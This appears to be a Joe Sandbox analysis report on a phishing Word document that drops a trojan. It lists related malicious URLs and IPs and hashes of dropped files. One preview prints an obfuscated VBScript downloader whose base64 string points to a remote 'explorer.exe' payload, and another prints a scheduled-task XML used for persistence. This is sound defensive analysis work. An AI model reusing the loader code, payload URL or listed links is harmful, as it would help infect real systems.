Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winDOC@43/31@2/2
EGA Information:	Successful, ratio: 60%
HDC Information:	Failed
HCA Information:	Successful, ratio: 77% Number of executed functions: 216 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target MSBuild.exe, PID 2040 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1624 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:13:19	API Interceptor	126x Sleep call for process: powershell.exe modified
08:13:32	API Interceptor	477x Sleep call for process: explorer.exe modified
08:13:39	API Interceptor	4x Sleep call for process: schtasks.exe modified
08:13:47	API Interceptor	232x Sleep call for process: MSBuild.exe modified
08:14:29	API Interceptor	1x Sleep call for process: notepad.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
20.126.95.155	PN86yqo5GU.exe	Get hash	malicious	Browse
	New contract - Amoje.doc	Get hash	malicious	Browse
	D3Nc5nDrKx.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://talotimppa-my.sharepoint.com/:o:/g/personal/satu_ristimaa_talotimppa_fi/Et4bTlq3DKNJlWystxb0POkBE2OT5mnyCpUeE49BjUDuNQ?e=5%3axRXTkg&at=9%22,%22https://talotimppa-my.sharepoint.com/personal/satu_ristimaa_talotimppa_fi/_layouts/15/Doc.aspx?sourcedoc=%7B5a4e1bde-0cb7-49a3-956c-acb716f43ce9%7D&action=default&slrid=c77267a0-20bf-5000-3ac9-dc60746c0726&originalPath=aHR0cHM6Ly90YWxvdGltcHBhLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL3NhdHVfcmlzdGltYWFfdGFsb3RpbXBwYV9maS9FdDRiVGxxM0RLTkpsV3lzdHhiMFBPa0JFMk9UNW1ueUNwVWVFNDlCalVEdU5RP3J0aW1lPUZORzhPWS1jMmtn&cid=0ea91533-a909-480d-a8e1-4c762c883635%22,%22https://talotimppa-my.sharepoint.com/personal/satu_ristimaa_talotimppa_fi/_layouts/15/doc2.aspx?sourcedoc=%7B5a4e1bde-0cb7-49a3-956c-acb716f43ce9%7D&action=default&slrid=c77267a0-20bf-5000-3ac9-dc60746c0726&originalPath=aHR0cHM6Ly90YWxvdGltcHBhLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL3NhdHVfcmlzdGltYWFfdGFsb3RpbXBwYV9maS9FdDRiVGxxM0RLTkpsV3lzdHhiMFBPa0JFMk9UNW1ueUNwVWVFNDlCalVEdU5RP3J0aW1lPUZORzhPWS1jMmtn&cid=0ea91533-a909-480d-a8e1-4c762c883635	Get hash	malicious	Browse	20.135.20.1
	https://stpete.mobirisesite.com/	Get hash	malicious	Browse	13.107.246.60
	http://url1985.yellowbook-cpe.com/ls/click?upn=uYTz-2BQ28Ogl8-2FJZ5WWt7uGi9lFefeVIgHHKTxOK4Lcrl-2FjecAOblWQSsBgU471wYge-2BU7CHL0VESSgMh5UUQ4P33weUYcdQCjsHKCIsIg05QrgQwN1LUtEZ89-2Fazbpst0OuON7TQvqUuMi-2FTNeXhtmbQt9-2Bw3b9D-2Bttf1brLZd3BpBayVQ0mCS-2FS7pJMLrjQh4Aip-2FMqiDFIdvwSp72KdA-3D-3DHKk5_xyJJTCg5g4AbLZDRNq5Vayn-2BQt1czNRXn2wuQz4y5vDBEOldDI9Bctadt0wT6pf-2FzcahxaRGizFZZ-2FJwBfroiOcQ4Utc5K2NDQ66aan-2FQaGpuTZiLnZqCkODKn1H4GHXrtrn45-2F-2FaVZqXG8gPT1Z6yjNvsNGcEPXH-2FGV4kDYWW7hpY9u0i6k8NlFwMsUih91Yl2a7MsT0gC8b8Gpm6riww-3D-3D	Get hash	malicious	Browse	13.107.246.60
	https://metropolisretail-my.sharepoint.com/:o:/p/lhanshaw/Es2GuwQc46xHnjBw763I5dYBZj2Vtq9rQLDb0eCb1YdbeA?e=5%3aASovhu&at=9	Get hash	malicious	Browse	13.105.28.32
	SecuriteInfo.com.Trojan.Siggen18.49748.12689.11865.exe	Get hash	malicious	Browse	13.107.43.13
	SecuriteInfo.com.Trojan.Siggen18.49748.28556.31887.exe	Get hash	malicious	Browse	13.107.43.12
	https://hamlettgarnettlaw-my.sharepoint.com/:o:/p/andrew/EgeFbpN3kbhIiKsiyyLFTzYBBGhiwVTWLicAKj-svkFk9Q?e=3i6e2z	Get hash	malicious	Browse	13.105.28.48
	xbIHOhYdOk.exe	Get hash	malicious	Browse	40.93.207.1
	ATT00001.htm	Get hash	malicious	Browse	13.107.246.60
	https://sendgrid@developer-sendgridapp.azurefd.net/	Get hash	malicious	Browse	13.107.246.60
	O5DZ3w4gij.elf	Get hash	malicious	Browse	104.212.248.6
	g2EQhyk6v4.elf	Get hash	malicious	Browse	20.118.153.233
	5r53b4ErLL.elf	Get hash	malicious	Browse	40.108.100.68
	https://netorg9476751-my.sharepoint.com/:o:/g/personal/shannonj_duluthtype_com/EsJrBkHVswlDtWtDNEsLT0EBtz5iwT0KRUh_IBihzM2VzQ?e=5%3arDZcSP&at=9	Get hash	malicious	Browse	13.104.208.160
	https://schollarchitekten-my.sharepoint.com/:o:/g/personal/info_buero-walker_de/ErIIUohaOWJCjtREdMxTlHkB3JXJwMRaD-ki2wZui9oQZw?e=TZg10d	Get hash	malicious	Browse	20.135.20.1
	https://iui.modeflooring.com.au/&m=dG9sb3BnYXZlbkByb3lhbGZsb3JhaG9sbGFuZC5jb20=	Get hash	malicious	Browse	13.107.246.60
	https://netorg9476751-my.sharepoint.com:443/:o:/g/personal/shannonj_duluthtype_com/EsJrBkHVswlDtWtDNEsLT0EBtz5iwT0KRUh_IBihzM2VzQ?e=5%3arDZcSP&at=9	Get hash	malicious	Browse	13.107.213.45
	arm-20220922-1226.elf	Get hash	malicious	Browse	40.82.61.168
	https://netorg9476751-my.sharepoint.com:443/:o:/g/personal/shannonj_duluthtype_com/EsJrBkHVswlDtWtDNEsLT0EBtz5iwT0KRUh_IBihzM2VzQ?e=5%3arDZcSP&at=9	Get hash	malicious	Browse	13.107.6.171
	arm7-20220922-1224.elf	Get hash	malicious	Browse	157.56.153.231
CELANESE-US	4m4yc8lii5.exe	Get hash	malicious	Browse	159.223.57.212
	4m4yc8lii5.exe	Get hash	malicious	Browse	159.223.57.212
	b7I7zBsmHf.exe	Get hash	malicious	Browse	159.223.57.212
	a8gErJvTwa.exe	Get hash	malicious	Browse	159.223.57.212
	TrM892WqR2.exe	Get hash	malicious	Browse	159.223.57.212
	BlB8WxjJjV.exe	Get hash	malicious	Browse	159.223.57.212
	2ttjTwKqh3.exe	Get hash	malicious	Browse	159.223.57.212
	Budget.xlsm	Get hash	malicious	Browse	159.223.57.212
	Budget.xlsm	Get hash	malicious	Browse	159.223.57.212
	7by7u2tzA1.elf	Get hash	malicious	Browse	159.223.241.35
	https://cdn.viglink.com/api/click?USCLIYSGQJSIRCMLBKBU&out=WESIOBYIY62116nlbvhg%2E%65%66%31%69%2E%73%62%73%2FUOKKRWUTV%2FYTQZVV%2FT1R4WE1VVTVSamxGTzBKWlVqdFdOVk03UmpWU01DYzVSVHhHS1VrN1VsbEVPVEFnSUE9PTppdXNnbm9waGE=&drKey=251	Get hash	malicious	Browse	159.223.81.224
	liW1G8DB5r.dll	Get hash	malicious	Browse	159.223.133.120
	https://gs4k2yy659.live/jll/	Get hash	malicious	Browse	159.223.220.225
	GUlW5Oc3eW.elf	Get hash	malicious	Browse	159.223.56.82
	https://protect-us.mimecast.com/s/35hAClYVKPI1zLDkC4_E-B?domain=urldefense.proofpoint.com	Get hash	malicious	Browse	159.223.220.225
	5MJT6kO9wS	Get hash	malicious	Browse	159.223.216.66
	https://survey.zohopublic.eu/zs/cTBj32	Get hash	malicious	Browse	159.223.231.248
	avQ9MKD0jW	Get hash	malicious	Browse	159.223.216.24
	WindowsExperience.exe	Get hash	malicious	Browse	159.223.63.112
	Docs_password.hta	Get hash	malicious	Browse	159.223.37.182

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	974336
Entropy (8bit):	6.592752877706246
Encrypted:	false
SSDEEP:	12288:ahLuyAHrR2ZEgL6+8ik8VuLCBTodngkt8OsyqAx+NbqzjMRZeFoTPo:ahLuyyNmadFdgsF+NZRZeFgo
MD5:	87B246B26208A9831A4372664C518C2C
SHA1:	1599CBF0EE49DCB787866FBB7C297094ECD3AB4F
SHA-256:	27FD2AB0BBD65CBE5625932FA7AB1F484A06CBDFF8868129F10CD92321D99DAF
SHA-512:	4E7F5A217DBCD34EAADF867CD75ACB23AE01730794AE8AC23A2428BE5160FA8DFF78B5B3E202A1E898E73126CEA4FE19BF6A9F6457D136433D61E16435D69FF1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.......0...........s......o......(........0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o\|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&....0..+.........,..{.......+....,...{....o........(.......0............s....}.....s....}.....s....}..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\177069AF.wmf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
Category:	dropped
Size (bytes):	3712
Entropy (8bit):	5.0373299643815015
Encrypted:	false
SSDEEP:	48:PuWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fF:Ok7Hgwj+mbYf3LSrhlOs0f5aSdHn63DN
MD5:	40A11389936D01876DE8991EE13B1DE9
SHA1:	DF39D9926B2DB17D0A7E2153E6F5A31E14A7720A
SHA-256:	FE9542C02AA1DE4322B580AA19D880DE54EE88F7D6280ADCB244FC2D9EAF45DE
SHA-512:	8EB4AEB3008313A7B7A8BE1298F30CB09789F4F19008D8DE2D2D30C4F69C814A4C3871281590AC8E510AFEC0C2073D8DA6BCC2A0C2B494709214A0DD3DCF258A
Malicious:	false
Preview:	......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA1522E6.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.029176838226622752
Encrypted:	false
SSDEEP:	12:dlL/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKE/Ws8GH:dlFsHT8v5GIw1Ew2sEi8+
MD5:	E582F2A011171992316D5DAA68512ED7
SHA1:	C71EEFB93628195D21512BBF499AFCC64BB42E33
SHA-256:	2580C3E1913FBC5CE7F2E5D4F4349F2F130A3980B1A4D6E824883EC9120F903E
SHA-512:	D2B16F427CF3D8F0D282CE00B3564F838E8153D4681C5EEEE648FA677CEC564C2EF2DC15D6144AB92E11C12C2A32395B4AE4C08A12580FEE4ECF9841C0E07651
Malicious:	false
Preview:	X.'.....0Z......................`,. .:i.....+00..................S...Bi.....+00.................@._d.P......./.N................h..&...D.q..d..................G..Yr?.D..U..k0.................%H...{.M.1.F.L..................g.s.3..E..J.......................u...CB.2......................a..f."M..J.3\.+.......................I......]................M.6C...F....R......................E%.......6.....................S.llM....p..................v5..k.L.T..N.......................0%O.+U==e....................C.7.IJ..K-...k................P....YL.QX.Sh=s.................?.....B....e...................{.z..!.A....h.k~.................S..M.F....,0e................_.E.\C..N.,&%..................".pH....,..R..................,.!.PC..sg...<................L...X.(G.Y...9'.........................................................................................................................3..2............................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	47104
Entropy (8bit):	5.2958250054182585
Encrypted:	false
SSDEEP:	768:2OwzakaBa9aRaOa2EgpvaPCOoYPW1+wnAn8rb8WkWDOwzakaBa9aRaOa2EgpvaPF:2OwzakaBa9aRaOa2EOLndkWDOwzakaBq
MD5:	668B497E20E06B79D51DF9168519289D
SHA1:	FEFFA7A4A5DBC1BFBF1EAA060F8C1FA9B1D220B2
SHA-256:	7D5D867A0DC8ACC36333DA47F96F772F88935ABA0FD126B3B8B2A5E49F936D1E
SHA-512:	867B25C88B501A0D69912FBFE9B2629F2A3D034637B78F5B27ECE14D9D90B7523720053D351AFE03782779207146FF160FA6740D73BC9EACACAF011239A31DCB
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W...$...#........................................................................................................... ...!...".......%...&...+...'...(...)...*.......,...-.../...N...V...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M.......O...P...Q...R...S...T...U...X...........Y...Z...................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{146C24E6-EE9A-4BF4-BC74-016BA7AD9293}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	44098
Entropy (8bit):	2.8795995628350415
Encrypted:	false
SSDEEP:	768:jl/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:pFia0Dqeb0nstw29rVzWSgm58F
MD5:	504BCEB76B1B1F81805B3CEF7AF2ADB9
SHA1:	C27B1C1B74FE742D7CBCF761A77228DB521355CC
SHA-256:	4F4592D04ECE34F52E4A726EC2F1305E403BF7F763658AFCF79ADC209DD3229D
SHA-512:	F31F3225059F17A91E5200EA9777556609FC5929C00CEDA402AC56B68168F03042A4B5ABA9F18478F94A3D194E65ABCA53E8455D0DA956EE286EC2429E7B2F11
Malicious:	false
Preview:	c.0.5.=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.D.Z.d.t.f.h.g.Y.g.e.g.h.D.{.....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K.........................................................................................................................................................................................................................................................H...R...X............................................................................................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j...f...CJ..OJ..QJ..U..^J..aJ.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9CEE7D2D-9EE4-4FEB-932A-E7FDD2AB9079}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD169163-57D1-49B2-967A-20BA2BE15787}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849453
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlba:IiiiiiiiiifdLloZQc8++lsJe1Mz9
MD5:	6B81A62087B1275058CB5F290E114665
SHA1:	BA97D7EC2644E7820E7617C33981B5FA31102E77
SHA-256:	792572FCB0FDB7529A0B19092F03EA77C96E89B2DF16A08BCEDDDEA6DEEFE2AC
SHA-512:	EEBB0F889DD906DC2FA0458AD2B467045B7CD8724553265D77E85232F9F17A363C683FFB1D50133B153C8D8ACCD4B0F07A8228C950681C269E65C0A3367B8130
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	14967
Entropy (8bit):	5.2903052371566135
Encrypted:	false
SSDEEP:	384:tnO6zzakaBa9aRaOa2EqJpvaYQci7oOoLEEE6oEaE32vwnAn8rb8WbTy:VOwzakaBa9aRaOa2EgpvaPCOoYPW1+wI
MD5:	8897D3DECD33AFBC963A1237D8243E51
SHA1:	2647121672D52A64186778657026815EF6431B08
SHA-256:	5856851814E97939F46FD211B8F48F64E1DC0EE6A6CF0EA37C9D890C97B2E513
SHA-512:	DE62D246BCE7A60476AF59E466D7FFE51C4CC621B3D35B8B2E2E277C901E4F875D7175610DD74795C90281AE9FA96CB1289A5EC7196B7AEE1706C3F20224AB34
Malicious:	true
Preview:	..<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr =

C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:gAWY3n:qY3n
MD5:	FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA1:	D59FC84CDD5217C6CF74785703655F78DA6B582B
SHA-256:	EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
SHA-512:	AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..

C:\Users\user\AppData\Local\Temp\tmp6336.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\explorer.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.106338392454611
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
MD5:	0490F3A3332FFCEB090DAAA0B90A5B44
SHA1:	BCE6A4967E641B4A375CEE835D68D8DDD2702616
SHA-256:	4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
SHA-512:	3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\explorer.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.106338392454611
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
MD5:	0490F3A3332FFCEB090DAAA0B90A5B44
SHA1:	BCE6A4967E641B4A375CEE835D68D8DDD2702616
SHA-256:	4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
SHA-512:	3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpFA37.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\explorer.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.106338392454611
Encrypted:	false
SSDEEP:	24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
MD5:	0490F3A3332FFCEB090DAAA0B90A5B44
SHA1:	BCE6A4967E641B4A375CEE835D68D8DDD2702616
SHA-256:	4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
SHA-512:	3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Sep 23 14:13:10 2022, length=221545, window=hide
Category:	dropped
Size (bytes):	1249
Entropy (8bit):	4.605411221812945
Encrypted:	false
SSDEEP:	24:8S/XThOMEf/xfPGpUc8f4urejVPLRGpUc8f4+Dv3qSncX7cY:8S/XT4VHxfPGmc8f4ur8dGmc8f41WKl
MD5:	039B3BAE1AC43CFB4B7A55E0718CE3DE
SHA1:	5AC7365C5347CB79104F8D8AFFA1D06C682E69C5
SHA-256:	6050A6269F4F98C76500E88338B39A51ACA713B42DA3B9BB317FE91AC95CF462
SHA-512:	FCEBDF39501F151E63AD1C362E1A0BBABAB589146264FAFBF01A855344966CDBC14D61C5DE38D24A66ED81ADBE0CED2464FA1F42CCCB9B99F536529832B94E97
Malicious:	false
Preview:	L..................F.... ........3.......3..,.j.^...ia......................-....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ia..7U.y .ITEMSE~1.DOC.........hT..hT.....r.....'...............I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc.T.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.........:..,.LB.)...Ag...

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	165
Entropy (8bit):	5.127513882806606
Encrypted:	false
SSDEEP:	3:bDuMJl0RGlKCEQRWTj/tyWiTJ11lmX11IMlKCEQRWTj/tyWiTJ11lv:bCZGlvwnSThElvwnSTh1
MD5:	8745E4FCA864966DBC611F9B69DB56FF
SHA1:	00042A24EF471653B234494113FD49D58F966DA0
